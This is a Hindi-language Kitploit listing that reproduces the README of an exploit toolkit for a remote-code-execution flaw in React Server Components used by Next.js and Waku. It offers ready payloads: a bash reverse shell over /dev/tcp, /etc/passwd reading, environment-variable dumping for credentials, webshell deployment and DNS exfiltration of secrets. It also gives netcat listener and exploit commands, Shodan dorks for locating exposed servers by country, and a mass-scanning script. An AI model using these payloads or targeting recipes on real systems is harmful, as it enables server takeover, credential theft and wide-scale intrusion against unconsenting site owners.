Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-RCE-CVE-2025-55182 — उन्नत RCE शोषण टूलकिट जो React Server Components कमजोरियों के लिए है। इसमें कई पूर्व-निर्मित पेलोड, लक्ष्य खोज के लिए Shodan एकीकरण, और अधिकृत पैठ परीक्षण के लिए बड़े पैमाने पर स्कैनिंग की सुविधाएँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/ilixm/poc-rce-cve-2025-55182
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
पेलोड डेवलपमेंट
GitHubilixm/poc-rce-cve-2025-55182

PoC-RCE-CVE-2025-55182

उन्नत RCE शोषण टूलकिट जो React Server Components कमजोरियों के लिए है। इसमें कई पूर्व-निर्मित पेलोड, लक्ष्य खोज के लिए Shodan एकीकरण, और अधिकृत पैठ परीक्षण के लिए बड़े पैमाने पर स्कैनिंग की सुविधाएँ शामिल हैं।

रिपॉजिटरी देखें
149 महीने पहलेअभी तक समीक्षित नहीं

🔥 RSC RCE एक्सप्लॉइट टूलकिट

Version License Node Platform

React सर्वर कंपोनेंट्स रिमोट कोड निष्पादन भेद्यताओं के लिए उन्नत एक्सप्लॉइटेशन टूलकिट

केवल अधिकृत पेनेट्रेशन टेस्टिंग और सुरक्षा अनुसंधान के लिए

विशेषताएँ • स्थापना • उपयोग • Shodan एकीकरण • उदाहरण • अस्वीकरण


📋 विषय-सूची

  • अवलोकन
  • भेद्यता विवरण
  • विशेषताएँ
  • स्थापना
  • त्वरित प्रारंभ
  • उपयोग
    • बुनियादी एक्सप्लॉइटेशन
    • उपलब्ध पेलोड
    • कस्टम पेलोड
  • Shodan एकीकरण
  • स्वचालित स्कैनिंग
  • उदाहरण
  • शमन
  • प्रभावित संस्करण
  • योगदान
  • अस्वीकरण
  • लाइसेंस

🎯 अवलोकन

यह टूलकिट React सर्वर कंपोनेंट्स (RSC) कार्यान्वयनों में एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता का शोषण करता है, विशेष रूप से लक्षित करते हुए:

  • Next.js (संस्करण 13.4.0 - 14.1.0)
  • Waku (भेद्य संस्करण)

यह भेद्यता सर्वर पर मनमाना कोड निष्पादन प्राप्त करने के लिए RSC के डेटा हैंडलिंग तंत्र में प्रोटोटाइप प्रदूषण और असुरक्षित डी-सीरियलाइज़ेशन का लाभ उठाती है।

🔴 गंभीरता: क्रिटिकल

  • CVSS स्कोर: 9.8 (क्रिटिकल)
  • आक्रमण वेक्टर: नेटवर्क
  • आवश्यक विशेषाधिकार: कोई नहीं
  • उपयोगकर्ता इंटरैक्शन: कोई नहीं
  • प्रभाव: पूर्ण सर्वर समझौता

🔬 भेद्यता विवरण

तकनीकी पृष्ठभूमि

React सर्वर कंपोनेंट्स क्लाइंट और सर्वर के बीच डेटा स्थानांतरित करने के लिए एक कस्टम सीरियलाइज़ेशन प्रारूप का उपयोग करते हैं। यह भेद्यता इन फ्रेमवर्क्स द्वारा विशेष रूप से तैयार किए गए पेलोड को डी-सीरियलाइज़ और प्रोसेस करने के तरीके में मौजूद है।

आक्रमण श्रृंखला:

  1. पेलोड निर्माण: सर्कुलर रेफरेंस के साथ एक दुर्भावनापूर्ण RSC पेलोड तैयार करें
  2. प्रोटोटाइप प्रदूषण: Function कंस्ट्रक्टर तक पहुँचने के लिए $X:constructor:constructor का दुरुपयोग करें
  3. कोड इंजेक्शन: _prefix फ़ील्ड में मनमाना JavaScript इंजेक्ट करें
  4. निष्पादन: सर्वर पेलोड को डी-सीरियलाइज़ करता है और निष्पादित करता है

एक्सप्लॉइटेशन प्रवाह

Attacker → Malicious RSC Payload → Target Server
                                         ↓
                              Unsafe Deserialization
                                         ↓
                              Prototype Chain Access
                                         ↓
                              Function Constructor
                                         ↓
                              ⚠️ RCE ACHIEVED ⚠️

✨ विशेषताएँ

मुख्य क्षमताएँ

  • ✅ एकाधिक फ्रेमवर्क समर्थन: Next.js और Waku
  • ✅ 8 पूर्व-निर्मित पेलोड: PoC से पूर्ण रिवर्स शेल तक
  • ✅ कस्टम कोड निष्पादन: कोई भी JavaScript कोड इंजेक्ट करें
  • ✅ Shodan एकीकरण: स्वचालित लक्ष्य खोज
  • ✅ मास स्कैनिंग: स्वचालित रूप से कई लक्ष्यों का परीक्षण करें
  • ✅ पेशेवर CLI: संपूर्ण कमांड-लाइन इंटरफ़ेस
  • ✅ विस्तृत लॉगिंग: टाइमस्टैम्प के साथ रंग-कोडित आउटपुट
  • ✅ त्रुटि प्रबंधन: मजबूत त्रुटि प्रबंधन

पूर्व-निर्मित पेलोड

पेलोडविवरणउपयोग केस
consoleबुनियादी PoC (console.log)भेद्यता सत्यापित करें
reverseShellBash रिवर्स शेलप्रारंभिक अभिगम
readFile/etc/passwd पढ़ेंफाइलसिस्टम अभिगम
envDumpपर्यावरण चर डंप करेंक्रेडेंशियल निष्कर्षण
execCommandसिस्टम कमांड निष्पादित करेंमनमाना कमांड निष्पादन
webshellExpress वेबशेल तैनात करेंस्थायी अभिगम
exfilPackagepackage.json एक्सफिल्ट्रेट करेंडिपेंडेंसी विश्लेषण
dnsExfilDNS एक्सफिल्ट्रेशन (OOB)ब्लाइंड एक्सप्लॉइटेशन

📦 स्थापना

पूर्वापेक्षाएँ

  • Node.js >= 16.0.0
  • npm या yarn
  • Shodan CLI (वैकल्पिक, स्वचालित स्कैनिंग के लिए)

रिपॉजिटरी क्लोन करें

git clone https://github.com/yourusername/rsc-rce-exploit.git
cd rsc-rce-exploit

डिपेंडेंसी स्थापित करें

npm install
# or
yarn install

Shodan सेटअप करें (वैकल्पिक)

# Install Shodan CLI
pip install shodan

# Initialize with your API key
shodan init YOUR_API_KEY

🚀 त्वरित प्रारंभ

1. बुनियादी भेद्यता जाँच

node rsc-rce-exploit.js --target http://vulnerable-target.com --payload console

2. रिवर्स शेल प्राप्त करें

# Start listener
nc -lvnp 4444

# Execute exploit
node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload reverseShell \
  --lhost 10.10.14.5 \
  --lport 4444

3. कस्टम कमांड निष्पादित करें

node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload execCommand \
  --command "whoami"

📖 उपयोग

बुनियादी एक्सप्लॉइटेशन

node rsc-rce-exploit.js [options]

विकल्प

विकल्पविवरणआवश्यक
--target <url>लक्ष्य URL✅
--framework <name>फ्रेमवर्क: next या waku❌ (डिफ़ॉल्ट: next)
--payload <name>पेलोड नाम (नीचे देखें)✅*
--custom <code>कस्टम JavaScript कोड✅*
--lhost <ip>आपका IP (रिवर्स शेल के लिए)❌
--lport <port>आपका पोर्ट (रिवर्स शेल के लिए)❌
--command <cmd>निष्पादित करने हेतु कमांड❌
--endpoint <path>कस्टम RSC एंडपॉइंट (Waku)❌
--action-id <id>कस्टम next-action ID❌
--listउपलब्ध पेलोड सूचीबद्ध करें❌
--verboseविस्तृत आउटपुट❌
--helpसहायता दिखाएँ❌

*--payload या --custom में से कोई एक आवश्यक है

उपलब्ध पेलोड

सभी पेलोड देखें:

node rsc-rce-exploit.js --list

आउटपुट:

📋 Available payloads:

  console              - Basic PoC - Console output
    Code: console.log(7*7+1)

  reverseShell         - Reverse shell (bash)
    Code: require('child_process').exec('bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"')

  readFile             - Read /etc/passwd
    Code: console.log(require('fs').readFileSync('/etc/passwd','utf8'))

  envDump              - Dump environment variables
    Code: console.log(JSON.stringify(process.env,null,2))

  execCommand          - Execute system command
    Code: console.log(require('child_process').execSync('COMMAND').toString())

  webshell             - Write webshell to /tmp
    Code: require('fs').writeFileSync('/tmp/shell.js','...')

  exfilPackage         - Read package.json
    Code: console.log(require('fs').readFileSync('./package.json','utf8'))

  dnsExfil             - DNS exfiltration
    Code: require('dns').resolve4(Buffer.from(process.env.SECRET||'nosecret')...)

कस्टम पेलोड

कोई भी JavaScript कोड निष्पादित करें:

node rsc-rce-exploit.js \
  --target http://target.com \
  --custom "require('fs').readdirSync('.').forEach(f=>console.log(f))"

🌐 Shodan एकीकरण

Shodan Dorks

Next.js लक्ष्य

# Basic Next.js
http.component:"Next.js"

# Next.js with RSC
http.html:"__next" http.html:"RSC"

# Next.js dev mode (more vulnerable)
http.html:"__NEXT_DATA__" http.html:"development"

# Self-hosted Next.js (not on Vercel)
http.component:"Next.js" -org:"Vercel"

# Geographically targeted (France)
http.component:"Next.js" country:FR

# Ultimate combo for pentesting
http.component:"Next.js" http.status:200 country:FR -org:"Vercel" port:3000,8080

Waku लक्ष्य

# Waku framework
http.html:"waku" http.html:"RSC"

# Waku RSC endpoints
http.path:"/RSC/"

स्वचालित Shodan स्कैनिंग

प्रदान की गई स्वचालन स्क्रिप्ट का उपयोग करें:

# Scan and test automatically
./shodan-scanner.sh "http.component:\"Next.js\" country:FR" 100
टूल डाउनलोड करें